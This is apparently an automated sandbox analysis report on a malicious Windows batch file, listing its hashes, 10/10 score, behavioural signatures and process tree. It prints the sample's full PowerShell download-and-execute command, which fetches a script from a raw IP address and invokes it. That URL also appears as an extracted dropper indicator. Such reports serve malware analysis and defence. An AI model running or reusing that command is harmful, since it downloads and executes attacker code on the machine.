Analysis
-
max time kernel
112s -
max time network
119s -
platform
windows7_x64 -
resource
win7 -
submitted
03-08-2020 09:10
Static task
static1
Behavioral task
behavioral1
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
2b4587aed40db6e44cbff092b52b841e.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
2b4587aed40db6e44cbff092b52b841e.bat
-
Size
218B
-
MD5
c69dabb8c2f1ca155fb5fe3b0482d0a7
-
SHA1
b3faaf0bd82fe27b076ec814b2123cf962ead51b
-
SHA256
99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
-
SHA512
c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1124 wrote to memory of 836 1124 cmd.exe powershell.exe PID 1124 wrote to memory of 836 1124 cmd.exe powershell.exe PID 1124 wrote to memory of 836 1124 cmd.exe powershell.exe PID 1124 wrote to memory of 836 1124 cmd.exe powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 836 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 836 powershell.exe 836 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 836 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:836